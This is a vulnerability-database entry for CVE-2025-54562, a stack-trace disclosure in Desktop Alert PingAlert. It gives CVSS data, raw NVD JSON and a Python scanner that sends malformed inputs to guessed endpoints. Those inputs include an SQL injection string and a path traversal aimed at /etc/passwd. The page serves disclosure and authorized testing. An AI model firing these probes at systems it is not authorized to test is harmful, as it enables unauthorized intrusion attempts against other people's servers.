Security Vulnerability Report
CVE-2025-54562 CVSS 4.3 MEDIUM

CVE-2025-54562

Published: 2025-11-14 18:15:50
Last Modified: 2025-11-20 14:40:28

Description

A vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Technical Information to be Disclosed through stack trace.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE
Desktop Alert PingAlert 6.1.0.11
Desktop Alert PingAlert 6.1.1.0
Desktop Alert PingAlert 6.1.1.1
Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
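# CVE-2025-54562 PoC - Desktop Alert PingAlert Stack Trace Information Disclosure
# This PoC demonstrates how to trigger stack trace disclosure
#
# Reviewer notes (all taken from the advisory data shown on this page):
#   * Weakness class is CWE-209 (error message containing sensitive information).
#   * The CVSS vector is AV:N/AC:L/PR:L, i.e. low privileges are required. This
#     script sends no credentials, so it does not exercise authenticated paths.
#   * The description gives versions 6.1.0.11 to 6.1.1.2, while the CPE match
#     data lists versionStartIncluding 6.1.0.11 and versionEndExcluding 6.1.1.5.
#     Use the wider range when deciding what to inventory and patch.
#   * Vendor advisory: https://desktopalert.net/cve-2025-54562/
#   * The general remedy for CWE-209 is to return a generic error body to the
#     client and keep exception detail in server-side logs only.
import requests
import sys

# Every substring the check looks for, in the order they are reported.
# Matching is done against the lower-cased response body.
_STACK_TRACE_INDICATORS = (
    "stack trace",
    "at line",
    ".java:",
    "exception in thread",
    "nullpointer",
    "null pointer",
    "arrayindexoutofbounds",
    "at com.",
    "at system.",
    "stacktrace",
    "exception",
    "error",
    "caused by:",
)

# Indicators that also appear in ordinary, correctly handled error responses
# (for example a JSON body such as {"error": "null pointer exception"}).
# They support a finding but cannot establish one on their own.
_GENERIC_INDICATORS = frozenset({
    "nullpointer",
    "null pointer",
    "arrayindexoutofbounds",
    "exception",
    "error",
})


def _stack_trace_matches(body_text):
    """Return the indicators that suggest *body_text* contains a stack trace.

    The result is the list of matched indicators when at least three match and
    at least one of them is trace-shaped (not in ``_GENERIC_INDICATORS``);
    otherwise it is an empty list. Requiring a trace-shaped match keeps a plain
    error message that merely names an exception from being reported as a
    disclosed stack trace.
    """
    lowered = body_text.lower()
    matches = [ind for ind in _STACK_TRACE_INDICATORS if ind in lowered]
    has_trace_shape = any(ind not in _GENERIC_INDICATORS for ind in matches)
    if len(matches) >= 3 and has_trace_shape:
        return matches
    return []


def test_cve_2025_54562(target_url):
    """
    Test for CVE-2025-54562: Information Disclosure via Stack Trace
    Target: Desktop Alert PingAlert Application Server
    Versions: 6.1.0.11 to 6.1.1.2

    Posts each malformed JSON body to each candidate path under *target_url*
    and reports responses whose text looks like a stack trace.

    Returns a list of dicts with the keys ``endpoint``, ``payload``,
    ``indicators`` and ``status_code``, one per flagged response.

    Limits of this check:
      * The endpoint paths and parameter name are generic guesses; the
        advisory text on this page names no endpoint or parameter. An empty
        result therefore does not show that a server is unaffected -- compare
        the installed version with the affected range instead.
      * Detection is substring matching on the response body. Read any flagged
        response before treating it as a confirmed disclosure.
    """
    print(f"[*] Testing target: {target_url}")
    print("[*] CVE-2025-54562 PoC - Information Disclosure via Stack Trace\n")

    # Test cases to trigger stack trace. Each value is used only as malformed
    # input that the server may fail to handle; the check looks at the error
    # output, not at whether the input had any other effect.
    test_payloads = [
        # Malformed parameter values
        {"name": "Empty parameter", "data": {"id": ""}},
        {"name": "SQL injection attempt", "data": {"id": "' OR '1'='1"}},
        {"name": "Special characters", "data": {"id": "../../../../../etc/passwd"}},
        {"name": "Numeric overflow", "data": {"id": "999999999999999999"}},
        {"name": "Null byte injection", "data": {"id": "\x00test"}},
        {"name": "Long string", "data": {"id": "A" * 10000}},
    ]

    # Common endpoints that may be vulnerable
    endpoints = [
        "/api/alert",
        "/api/ping",
        "/api/status",
        "/api/health",
        "/alert/status",
        "/ping/check"
    ]

    base_url = target_url.rstrip('/')
    vulnerabilities_found = []

    for endpoint in endpoints:
        url = base_url + endpoint

        for payload in test_payloads:
            print(f"[*] Testing {payload['name']} on {endpoint}")
            try:
                # Send request with malformed data.
                # The fixed User-Agent makes these requests easy to pick out
                # of the server's access logs afterwards.
                response = requests.post(
                    url,
                    json=payload['data'],
                    headers={
                        "Content-Type": "application/json",
                        "User-Agent": "CVE-2025-54562-PoC"
                    },
                    timeout=10,
                    # NOTE(review): certificate verification is disabled, so
                    # the responder's identity is not checked. Acceptable only
                    # against a lab host with a self-signed certificate; a
                    # result obtained this way over an untrusted network
                    # cannot be attributed to the intended server.
                    verify=False
                )
            except requests.exceptions.RequestException as e:
                print(f"[-] Request failed: {e}")
                continue

            # Check for stack trace indicators
            matches = _stack_trace_matches(response.text)
            if matches:
                print(f"[!] VULNERABLE: {endpoint} - {payload['name']}")
                print(f"[!] Stack trace indicators found: {matches}")
                vulnerabilities_found.append({
                    "endpoint": endpoint,
                    "payload": payload['name'],
                    "indicators": matches,
                    "status_code": response.status_code
                })

    # Summary
    print("\n[*] Scan complete")
    print(f"[*] Vulnerabilities found: {len(vulnerabilities_found)}")

    if vulnerabilities_found:
        print("\n[!] VULNERABLE ENDPOINTS:")
        for vuln in vulnerabilities_found:
            print(f" - {vuln['endpoint']} ({vuln['payload']})")

    return vulnerabilities_found


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-54562-poc.py <target_url>")
        print("Example: python cve-2025-54562-poc.py http://target.com:8080")
        sys.exit(1)

    target = sys.argv[1]
    test_cve_2025_54562(target)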

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54562", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:49.687", "lastModified": "2025-11-20T14:40:27.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Technical Information to be Disclosed through stack trace."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.5", "matchCriteriaId": "35DFA98A-F509-4F93-99A3-807C4B6548A2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54562/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}